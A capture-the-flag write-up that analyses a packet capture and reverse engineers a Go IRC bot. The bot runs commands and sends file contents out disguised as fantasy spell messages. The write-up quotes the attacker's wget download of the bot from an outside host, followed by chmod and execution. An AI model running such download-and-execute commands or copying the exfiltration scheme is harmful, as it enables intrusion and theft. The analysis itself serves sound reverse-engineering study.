Challenge 10

10 - Wizardcult

We have one final task for you.
We captured some traffic of a malicious cyber-space computer hacker interacting with our web server.
Honestly, I padded my resume a bunch to get this job and don't even know what a pcap file does.
Maybe you can figure out what's going on.

First part: Lazy method

If you have solved this challenge and just want to understand how the VM works, just go here

In this challenge, we got only one pcap file: “wizardcult.pcap”. Open it in Wireshark, we can see that the pcap contains a lot of TCP packets from 172.16.30.249 and 172.16.30.245. I will use “Follow TCP stream” function provided by Wireshark to see entire conversations.

The first stream:

Look like the server has been compromised and the attacker can run arbitrary command on the server.

The second stream:

Attacker use wget to download something to the server. The command after being urldecoded is wget -O /mages_tower/induct http://wizardcult.flare-on.com/induct.

The third stream: we can see the file that being downloaded. It might be an executable since we can see the “ELF” in the stream.

The fourth and fifth streams: attacker ran chmod +x /mages_tower/induct and /mages_tower/induct, the other streams: I don’t know what happened, but I can see some IRC command, maybe that is the traffic of the newly created process induct. Now we have to dump the binary from the pcap and reverse engineer it to see what is going on.

ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, not stripped

The file is a 64-bit executable. After opened it in IDA Pro, I know it is a Golang executable since it has a function named “main_main”. This function is also the entrypoint.

In this post, I will not go to deep into Golang internal, since it will make this post too long. Instead, you can read it here.

void __cdecl main_main()
{
  // ...
  github_com_lrstanley_girc_New(...);
  github_com_lrstanley_girc___ptr_Caller__sregister(
    *(_QWORD *)(v41 + 344),
    0,
    (__int64)"CLIENT_CONNECTEDCloud of DaggersContent-Encod",
    16LL,
    (__int64)&go_itab_github_com_lrstanley_girc_HandlerFunc_github_com_lrstanley_girc_Handler,
    (__int64)&p_handler_connected);
  github_com_lrstanley_girc___ptr_Caller__sregister(
    *(_QWORD *)(v41 + 344),
    0,
    (__int64)"PRIVMSGPadstow",
    7LL,
    (__int64)&go_itab_github_com_lrstanley_girc_HandlerFunc_github_com_lrstanley_girc_Handler,
    (__int64)&p_handler_privmsg);
  while ( 1 )
  {
    github_com_lrstanley_girc___ptr_Client__internalConnect(v41, 0LL, 0LL, 0LL, 0LL);
    if ( !v8 )
    {
      break;
    }
    time_Sleep(30000000000LL);
  }
}

In the function above, we can see it calls some functions, which start with github_com_lrstanley_girc. It turned out that, this is an open source IRC client from github. Having the source code of the library is very good since it will make reverse engineering and debugging easier. The “main_main” function is just a modified version of an example in the respository.

func Example_commands() {
    client := girc.New(girc.Config{
        Server: "irc.byteirc.org",
        Port:   6667,
        Nick:   "test",
        User:   "user",
        Name:   "Example bot",
        Out:    os.Stdout,
    })

    client.Handlers.Add(girc.CONNECTED, func(c *girc.Client, e girc.Event) {
        c.Cmd.Join("#channel", "#other-channel")
    })

    client.Handlers.Add(girc.PRIVMSG, func(c *girc.Client, e girc.Event) {
        if strings.HasPrefix(e.Last(), "!hello") {
            c.Cmd.ReplyTo(e, girc.Fmt("{b}hello{b} {blue}world{c}!"))
            return
        }

        if strings.HasPrefix(e.Last(), "!stop") {
            c.Close()
            return
        }
    })

    if err := client.Connect(); err != nil {
        log.Fatalf("an error occurred while attempting to connect to %s: %s", client.Server(), err)
    }
}

In the binary, “Server” had been changed to “wizardcult.flare-on.com”, and “Nick” became “Izahl” (we can see the “Nick” in Wireshark)

The program handled two events, which are “girc.CONNECTED” (received when client connected to server) and “girc.PRIVMSG” (received when client received new message). The two handler functions are at 0x6C1920 and 0x6C1DA0, they are the “core” of the program. The program is big, we don’t want to reverse engineer all components of it, so we will let it run and watch for its behavior.

Setting up environment

We will have to setup a new IRC server, so that the program can connect to. I use a Windows machine to host UnrealIRCd, which is a free IRC server. After that, I append this line to /etc/hosts

192.168.50.175  wizardcult.flare-on.com

so that the program will connect to 192.168.50.175 (my Windows machine’s IP) instead of wizardcult.flare-on.com.

Note: You should disable fakelag and anti-flood in UnrealIRCd, so that the connection won’t be kill when client sends messages too fast.

To see the messages sent by the program, I also use another IRC client, pidgin. I use it because it has GUI (lol).

Back to the challenge

First, look at the pcap file, we can see the program join server #dungeon

Let the program runs, and we see the program send a message:

Hello, I am Arrixyll, a 5 level Sorceror. I come from the land of Daemarrel-Aberystwyth-Rochdale-Scrabster.

Let it runs for a few times, it produces different outputs:

Hello, I am Ikey, a 5 level Sorceror. I come from the land of Daemarrel-Aberystwyth-Rochdale-Scrabster.
Hello, I am Izahl, a 5 level Sorceror. I come from the land of Daemarrel-Aberystwyth-Rochdale-Scrabster.
...

Turned out that, it used random name when joining the server. The code that change its name is at 0x6C1736. To make sure the output will be deterministic, I write a gdb script that will change name to “Izahl” (which is the same the name appears in pcap file).

define secretcommand
b *0x6c1736
comm
set $rcx=0x74d4bb
set $rax=5
c
end

Then just type “secretcommand” in gdb and after a “run” command, the program will join server as “Izahl”. But, after sending the message we seen above, the program doesn’t do anything else.

In the pcap, we can see, after the program sent the message, there is another user named dung3onm4st3r13 said “Izahl, what is your quest?” and then the program started to do something. This behavior can be seen in the function handler for “girc.PRIVMSG” event (which is at 0x6C1DA0). The function is big, but basically, it will:

  • Check who is sending the message, if it is not a channel message from dung3onm4st3r13, then do nothing.
  • Else:
    • It will concat all messages until the message contains a dot (.) character at the end.
    • The new message will be send to another function to be processed. This function is wizardcult_comms_ProcessDMMessage, at 0x652320.

Knowing the fact that the program only “listens to” dung3onm4st3r13, I will write a simple socket program to simulate dung3onm4st3r13. The method is easy, in the “Follow TCP stream” of Wireshark, I changed the “Show data as” option to “C Arrays”, and modify the output to get a quick and dirty python script.

After simulating the dung3onm4st3r13 bot, I see something in the terminal.

exit status 2
open /mages_tower/cool_wizard_meme.png: no such file or directory

Wait what, is it executing another commands? I tried putting breakpoints on system, execve but none of them hit, then I figured out it used os.Command and os.Output to run command. Knowing that, I put a breakpoint on 0x652004 (the code that calls os_exec_Command) to see what is being called.

According to the picture above, the full command is /bin/bash -c "ls /mages_tower". We create a new folder called “/mages_tower”, put in it a file named “cool_wizard_meme.png” (since we know it will look for this file). Content of this file can be anything you want, but I will write 60 A characters to it. After that, run the binary again and we will see two new outputs (and no error appears in terminal)

The first one:

Izahl: I quaff my potion and attack!
Izahl: I cast Moonbeam on the Goblin for 205d205 damage!
Izahl: I cast Reverse Gravity on the Goblin for 253d213 damage!
Izahl: I cast Water Walk on the Goblin for 216d195 damage!
Izahl: I cast Mass Suggestion on the Goblin for 198d253 damage!
Izahl: I cast Planar Ally on the Goblin for 199d207 damage!
Izahl: I cast Water Breathing on the Goblin for 140d210 damage!
Izahl: I cast Conjure Barrage on the Goblin for 197d168 damage!
Izahl: I do believe I have slain the Goblin

The second one:

Izahl: I quaff my potion and attack!
Izahl: I cast Greater Restoration on the Wyvern for 245d247 damage!
Izahl: I cast Locate Creature on the Wyvern for 134d160 damage!
Izahl: I cast Hold Person on the Wyvern for 2d55 damage!
Izahl: I cast Dream on the Wyvern for 247d150 damage!
Izahl: I cast Contact Other Plane on the Wyvern for 65d233 damage!
Izahl: I cast Clairvoyance on the Wyvern for 225d9 damage!
Izahl: I cast Hold Person on the Wyvern for 174d194 damage!
Izahl: I cast Searing Smite on the Wyvern for 112d35 damage!
Izahl: I cast Greater Restoration on the Wyvern for 245d247 damage!
Izahl: I cast Locate Creature on the Wyvern for 134d160 damage!
Izahl: I cast Hold Person on the Wyvern for 2d55 damage!
Izahl: I cast Dream on the Wyvern for 247d150 damage!
Izahl: I cast Contact Other Plane on the Wyvern for 65d233 damage!
Izahl: I cast Clairvoyance on the Wyvern for 225d9 damage!
Izahl: I cast Hold Person on the Wyvern for 174d194 damage!
Izahl: I cast Searing Smite on the Wyvern for 112d35 damage!
Izahl: I cast Greater Restoration on the Wyvern for 245d247 damage!
Izahl: I cast Locate Creature on the Wyvern for 134d160 damage!
Izahl: I cast Hold Person on the Wyvern for 2d55 damage!
Izahl: I cast Dream on the Wyvern for 247d150 damage!
Izahl: I do believe I have slain the Wyvern

We can see that both outputs start with I quaff my potion and attack!, end with I do believe I have slain the XXX and the between sentences have the format I cast AAA on the XXX for BBBdCCC damage!. These messages are generated in the function wizardcult_comms_CastSpells at 0x653680. This function receives a buffer, each loop it will encode 3 bytes into a sentence I cast AAA on the XXX for BBBdCCC damage!. AAA is the value of wizardcult_tables_Spells[byte[0]], BBB and CCC are the decimal values of byte[1] and byte[2] respectively.

The two outputs have 7 and 20 sentences so the buffers are 21 and 60 bytes in length. I believe the first output is the encypted form of the output of /bin/bash -c "ls /mages_tower", and the second one contains encrypted content of cool_wizard_meme.png. The reason is shown below:

(venv) vm@vm:~/Desktop/10$ /bin/bash -c "ls /mages_tower" | wc
      1       1      21
(venv) vm@vm:~/Desktop/10$ cat /mages_tower/cool_wizard_meme.png | wc
      0       1      60

Now, we will have to find out how the file is encrypted before it is encoded. But … we don’t need to do so. Let’s look at the second output again (I put some newlines so you can see it better)

Izahl: I quaff my potion and attack!

Izahl: I cast Greater Restoration on the Wyvern for 245d247 damage!
Izahl: I cast Locate Creature on the Wyvern for 134d160 damage!
Izahl: I cast Hold Person on the Wyvern for 2d55 damage!
Izahl: I cast Dream on the Wyvern for 247d150 damage!
Izahl: I cast Contact Other Plane on the Wyvern for 65d233 damage!
Izahl: I cast Clairvoyance on the Wyvern for 225d9 damage!
Izahl: I cast Hold Person on the Wyvern for 174d194 damage!
Izahl: I cast Searing Smite on the Wyvern for 112d35 damage!

Izahl: I cast Greater Restoration on the Wyvern for 245d247 damage!
Izahl: I cast Locate Creature on the Wyvern for 134d160 damage!
Izahl: I cast Hold Person on the Wyvern for 2d55 damage!
Izahl: I cast Dream on the Wyvern for 247d150 damage!
Izahl: I cast Contact Other Plane on the Wyvern for 65d233 damage!
Izahl: I cast Clairvoyance on the Wyvern for 225d9 damage!
Izahl: I cast Hold Person on the Wyvern for 174d194 damage!
Izahl: I cast Searing Smite on the Wyvern for 112d35 damage!

Izahl: I cast Greater Restoration on the Wyvern for 245d247 damage!
Izahl: I cast Locate Creature on the Wyvern for 134d160 damage!
Izahl: I cast Hold Person on the Wyvern for 2d55 damage!
Izahl: I cast Dream on the Wyvern for 247d150 damage!

Izahl: I do believe I have slain the Wyvern

Did you see the repeating parts after each 8 lines? Remember that the original content is 60 A characters? That means the encrypt algorithm has a key length of 8*3 = 24.

But what algorithm is it? We have to guess. First idea I think of is xor encryption. I tried writing the encrypted content (which received in the second output) to cool_wizard_meme.png, run the program again and check if I receive I cast ... on the XXX for 65d65 damage! (65 is the ASCII code of A). But there is no luck, I only receive a bunch of garbage. Clearly this is not xor encryption.

After changing the content of cool_wizard_meme.png and play with some outputs, I realize that one byte at different indices (mod 24) will produce different output. So what we can do is create all possible inputs, get the output and use it as a decryption map. The python script below generates the input:

with open('/mages_tower/cool_wizard_meme.png', 'wb') as f:
    for j in range(256):
        f.write( bytes([j])*24 )

After that, we can use this script to decrypt the image:

with open('./decryption_map', 'rb') as f:
    data = f.read()
with open('./encrypted_png', 'rb') as f:
    enc = f.read()
res = b''

for i in range(len(enc)):
    pos = i % 24
    cur = enc[i]
    for j in range(256):
        if data[pos+24*j] == cur:
            res += bytes([j])

with open('result.png', 'wb') as f:
    f.write(res)

Now we have solved the challenge but what the program did to our inputs is still a mysterious.

Second part: Understand the VM

Now we know how the program work, let’s get back to the function wizardcult_comms_ProcessDMMessage to see what it does to our inputs. This function receives messages from dung3onm4st3r13 and use them as commands:

  • If the message contains "you have learned how to create the ", it will take all the content after "combine" (until a dot character in encountered), split that string by the seperator ", ". The new slice contains splited strings will be decoded to a byte buffer by function wizardcult_tables_GetBytesFromTable.

This byte buffer is the serialize form of a struct, so it will be deserialize to get the actual struct. The code responsible for this is at 0x64D848. Since the binary is not stripped, we can easily get the definition of this struct. I use redress for this.

(venv) vm@vm:~/Desktop/10$ ./redress -type ./out.elf
type vm.Cpu struct{
    Acc int
    Dat int
    Pc int
    Cond int
    Instructions []vm.Instruction
    x0 chan int
    x1 chan int
    x2 chan int
    x3 chan int
    control chan int
}

type vm.Device interface {
    Execute(chan int)
    SetChannel(int, chan int)
}

type vm.InputDevice struct{
    Name string
    x0 chan int
    input chan int
    control chan int
}

type vm.Instruction struct{
    Opcode int
    A0 int
    A1 int
    A2 int
    Bm int
    Cond int
}

type vm.Link struct{
    LHDevice int
    LHReg int
    RHDevice int
    RHReg int
}

type vm.OutputDevice struct{
    Name string
    x0 chan int
    output chan int
    control chan int
}

type vm.Program struct{
    Magic int
    Input vm.InputDevice
    Output vm.OutputDevice
    Cpus []vm.Cpu
    ROMs []vm.ROM
    RAMs []vm.RAM
    Links []vm.Link
    controls []chan int
}

type vm.RAM struct{
    A0 int
    A1 int
    Data []int
    x0 chan int
    x1 chan int
    x2 chan int
    x3 chan int
    control chan int
}

type vm.ROM struct{
    A0 int
    A1 int
    Data []int
    x0 chan int
    x1 chan int
    x2 chan int
    x3 chan int
    control chan int
}

Note: in this program, size of an int is 8 bytes. You can find more here.

After deserializing, we will have a vm.Program struct. This struct will be passed to function wizardcult_vm___ptr_Program__Execute to actually run the VM. Let’s put a breakpoint on 0x64A920 and explore vm.Program content in gdb:

gef➤  p *p
$2 = {
  Magic = 0x1337, 
  Input = {
    Name = 0x0 "", 
    x0 = 0xc0002a2420, 
    input = 0x0, 
    control = 0x0
  }, 
  Output = {
    Name = 0x0 "", 
    x0 = 0xc0002a2480, 
    output = 0x0, 
    control = 0x0
  }, 
  Cpus = {
    array = 0xc000402000, 
    len = 0x2, 
    cap = 0x2
  }, 
  ROMs = {
    array = 0x0, 
    len = 0x0, 
    cap = 0x0
  }, 
  RAMs = {
    array = 0x0, 
    len = 0x0, 
    cap = 0x0
  }, 
  Links = {
    array = 0xc0002a23c0, 
    len = 0x3, 
    cap = 0x3
  }, 
  controls = {
    array = 0x0, 
    len = 0x0, 
    cap = 0x0
  }
}

Above is the content of first vm.Program, which executes /bin/bash -c "ls /mages_tower". Since we don’t care about this program, we will let the program continue to get the second VM.

gef➤  p *p
$3 = {
  Magic = 0x1337, 
  Input = {
    Name = 0x0 "", 
    x0 = 0xc0000246c0, 
    input = 0x0, 
    control = 0x0
  }, 
  Output = {
    Name = 0x0 "", 
    x0 = 0xc000024720, 
    output = 0x0, 
    control = 0x0
  }, 
  Cpus = {
    array = 0xc000228240, 
    len = 0x6, 
    cap = 0x6
  }, 
  ROMs = {
    array = 0xc00042a000, 
    len = 0x4, 
    cap = 0x4
  }, 
  RAMs = {
    array = 0x0, 
    len = 0x0, 
    cap = 0x0
  }, 
  Links = {
    array = 0xc000279c00, 
    len = 0x10, 
    cap = 0x10
  }, 
  controls = {
    array = 0x0, 
    len = 0x0, 
    cap = 0x0
  }
}

So what does wizardcult_vm___ptr_Program__Execute do?

  • It will call wizardcult_vm___ptr_InputDevice__Execute, wizardcult_vm___ptr_OutputDevice__Execute, wizardcult_vm___ptr_Cpu__Execute, wizardcult_vm___ptr_ROM__Execute, wizardcult_vm___ptr_RAM__Execute using goroutine.
  • These function take 2 parameters. First one is a pointer to vm.InputDevice/vm.OutputDevice/vm.Cpus/vm.ROMs/vm.RAMs, and second one is a chan int so that it can synchronously communicate with other routines.

The most interesting to us is probably wizardcult_vm___ptr_Cpu__Execute. This function will execute all instructions in vm.Cpu.Instructions, but it runs in another goroutine, so if multiple CPUs run at the same time, race condition will happen.

That is why vm.Link exists:

type vm.Link struct{
    LHDevice int
    LHReg int
    RHDevice int
    RHReg int
}

This struct is used to “link” 2 devices, LHDevice and RHDevice are used to identify which device (which Cpu, ROM or RAM), LHReg and RHReg identify which register of that device (X0, X1, X2 or X3). “Link” here means that one register of two devices will use the same chan int variable. All the vm.Links are processed inside wizardcult_vm_LoadProgram function.

You can imagine chan int is like a pipe in C, it can be read (received) from or written (sent) to. Moreover, sends and receives block until the other side is ready so it can be use to synchronize goroutines without locks or mutexes. That’s how the program avoids race condition.

Now back to wizardcult_vm___ptr_Cpu__Execute, this function is the heart of the VM. It fetchs the next instruction to execute, each instruction has an opcode:

0 : Nop
1 : Mov
2 : Jmp to vm.Cpu.A0
3 : 
4 : 
5 : Teq (compare if equal)
6 : Tgt (compare if greater than)
7 : Tlt (compare if less than)
8 : Tcp (compare and set flag -1, 0, 1)
9 : 
10: Sub
11: Mul
12: Div
13: Not
14: 
15: 
16: And
17: Or
18: Xor
19: Shl
20: Shr

With the above table, it’s easy to dump instructions in all vm.Cpu for reading. I will extract this infomation in memory using gdb script (the script is long so I will upload it in attachment file). The script must be run when RIP = 0x64a920 (first instruction of wizardcult_vm___ptr_Program__Execute)

-----------------Link-----------------
    Input.X0 - Cpus[0].X0 (0/0/2/0)
    Cpus[0].X1 - Output.X0 (2/1/1/0)
    Cpus[0].X2 - Cpus[1].X0 (2/2/3/0)
    Cpus[1].X1 - Cpus[2].X0 (3/1/4/0)
    Cpus[1].X1 - Cpus[2].X0 (3/1/4/0)
    Cpus[1].X2 - Cpus[5].X0 (3/2/7/0)
    Cpus[2].X1 - Roms[0].X0 (4/1/8/0)
    Cpus[2].X2 - Roms[0].X1 (4/2/8/1)
    Cpus[2].X3 - Cpus[3].X0 (4/3/5/0)
    Cpus[3].X1 - Roms[1].X0 (5/1/9/0)
    Cpus[3].X2 - Roms[1].X1 (5/2/9/1)
    Cpus[3].X3 - Cpus[4].X0 (5/3/6/0)
    Cpus[4].X1 - Roms[2].X0 (6/1/10/0)
    Cpus[4].X2 - Roms[2].X1 (6/2/10/1)
    Cpus[5].X1 - Roms[3].X0 (7/1/11/0)
    Cpus[5].X2 - Roms[3].X1 (7/2/11/1)

-----------------CPU[0]-----------------
Ins[0]:
    Cpus[0].Acc = Cpus[0].X0
Ins[1]:
    if Cpus[0].Acc == 0xffffffffffffffff:
        Cpus[0].Cond = 1
    else:
        Cpus[0].Cond = -1
Ins[2] (Cond = 0x1):
    Cpus[0].X1 = 0xffffffffffffffff
Ins[3] (Cond = 0x1):
    Cpus[0].Acc = Cpus[0].X0
Ins[4]:
    Cpus[0].X2 = Cpus[0].Acc
Ins[5]:
    Cpus[0].Acc = Cpus[0].X2
Ins[6]:
    Cpus[0].X1 = Cpus[0].Acc
-----------------CPU[1]-----------------
Ins[0]:
    Cpus[1].Acc = Cpus[1].X0
Ins[1]:
    Cpus[1].X1 = Cpus[1].Acc
Ins[2]:
    Cpus[1].Acc = Cpus[1].X1
Ins[3]:
    Cpus[1].X2 = Cpus[1].Acc
Ins[4]:
    Cpus[1].Acc = Cpus[1].X2
Ins[5]:
    Cpus[1].X1 = Cpus[1].Acc
Ins[6]:
    Cpus[1].Dat = Cpus[1].X1
Ins[7]:
    Cpus[1].Acc = 0x80
Ins[8]:
    Cpus[1].Acc &= Cpus[1].Dat
Ins[9]:
    if Cpus[1].Acc == 0x80:
        Cpus[1].Cond = 1
    else:
        Cpus[1].Cond = -1
Ins[10] (Cond = 0x1):
    Cpus[1].Acc = Cpus[1].Dat
Ins[11] (Cond = 0x1):
    Cpus[1].Acc ^= 0x42
Ins[12] (Cond = 0xFFFFFFFFFFFFFFFF):
    Cpus[1].Acc = Cpus[1].Dat
Ins[13]:
    Cpus[1].Acc ^= 0xFFFFFFFF
Ins[14]:
    Cpus[1].Acc &= 0xFF
Ins[15]:
    Cpus[1].X0 = Cpus[1].Acc
-----------------CPU[2]-----------------
Ins[0]:
    Cpus[2].Acc = Cpus[2].X0
Ins[1]:
    if Cpus[2].Acc > 0x63:
        Cpus[2].Cond = 1
    else:
        Cpus[2].Cond = -1
Ins[2] (Cond = 0x1):
    Cpus[2].X3 = Cpus[2].Acc
Ins[3] (Cond = 0x1):
    Cpus[2].X0 = Cpus[2].X3
Ins[4] (Cond = 0xFFFFFFFFFFFFFFFF):
    Cpus[2].X1 = Cpus[2].Acc
Ins[5] (Cond = 0xFFFFFFFFFFFFFFFF):
    Cpus[2].X0 = Cpus[2].X2
-----------------CPU[3]-----------------
Ins[0]:
    Cpus[3].Acc = Cpus[3].X0
Ins[1]:
    if Cpus[3].Acc > 0xc7:
        Cpus[3].Cond = 1
    else:
        Cpus[3].Cond = -1
Ins[2] (Cond = 0x1):
    Cpus[3].X3 = Cpus[3].Acc
Ins[3] (Cond = 0x1):
    Cpus[3].X0 = Cpus[3].X3
Ins[4] (Cond = 0xFFFFFFFFFFFFFFFF):
    Cpus[3].Acc -= 0x64
Ins[5] (Cond = 0xFFFFFFFFFFFFFFFF):
    Cpus[3].X1 = Cpus[3].Acc
Ins[6] (Cond = 0xFFFFFFFFFFFFFFFF):
    Cpus[3].X0 = Cpus[3].X2
-----------------CPU[4]-----------------
Ins[0]:
    Cpus[4].Acc = Cpus[4].X0
Ins[1]:
    Cpus[4].Acc -= 0xC8
Ins[2]:
    Cpus[4].X1 = Cpus[4].Acc
Ins[3]:
    Cpus[4].X0 = Cpus[4].X2
-----------------CPU[5]-----------------
Ins[0]:
    Cpus[5].Acc = Cpus[5].X1
Ins[1]:
    Cpus[5].Acc &= 0x1
Ins[2]:
    if Cpus[5].Acc == 0x1:
        Cpus[5].Cond = 1
    else:
        Cpus[5].Cond = -1
Ins[3]:
    Cpus[5].Dat = Cpus[5].X0
Ins[4]:
    Cpus[5].Acc = Cpus[5].X2
Ins[5] (Cond = 0x1):
    Cpus[5].Acc ^= 0xFFFFFFFF
Ins[6] (Cond = 0x1):
    Cpus[5].Acc &= 0xFF
Ins[7]:
    Cpus[5].Acc ^= Cpus[5].Dat
Ins[8]:
    Cpus[5].X0 = Cpus[5].Acc

The pseudo-code above is very simple. It takes me few minutes to convert to python code:

arr = b''
for i in range(3):
    with open(f'ROMs_data{i}.bin', 'rb') as f:
        data = f.read()
    assert len(data) % 8 == 0
    j = 0
    while j < len(data):
        tmp = int.from_bytes(data[j:j+8], 'little')
        arr += bytes([tmp])
        j += 8
#assert len(arr) == 256
key = b''
with open('ROMs_data3.bin', 'rb') as f:
    data = f.read()
    j = 0
    while j < len(data):
        tmp = int.from_bytes(data[j:j+8], 'little')
        key += bytes([tmp])
        j += 8
#assert len(key) == 24

def get_num(pos):
    return arr[pos]

cnt = 0
def enc(arg):
    global cnt
    k = key[cnt]
    if (cnt & 1) == 1:
        k ^= 0xFF
    cnt = (cnt + 1) % len(key)
    return k ^ arg

def enc_one(arg):
    dat = get_num(enc(get_num(arg)))
    if (dat & 0x80) == 0x80:
        dat ^= 0x42
    dat ^= 0xFF
    return dat

Cpus[1] became enc_one, Cpus[2/3/4] became get_num, Cpus[5] became enc, Cpus[0] is not important, it only receives input from vm.InputDevice and send output to vm.OutpuDevice. It is easy to write a decrypter now:

reverse_arr = [arr.find(i) for i in range(256)]
def dec_one(arg, idx):
    arg ^= 0xFF
    tmp = arg ^ 0x42
    if (tmp & 0x80) == 0x80:
        arg = tmp
    _enc = reverse_arr[arg]
    _dec = _enc ^ key[idx % 24]
    if (idx & 1) == 1:
        _dec ^= 0xff
    return reverse_arr[_dec]

with open('./encrypted_png', 'rb') as f:
    enc = f.read()
res = b''
for i in range(len(enc)):
    cur = enc[i]
    res += bytes([dec_one(cur, i)])
with open('dec.png', 'wb') as f:
    f.write(res)

And we get the flag!

Note: the decrypter above cannot be used to decrypt the first output since it uses another algorithm. I will leave this as an exercise for the readers.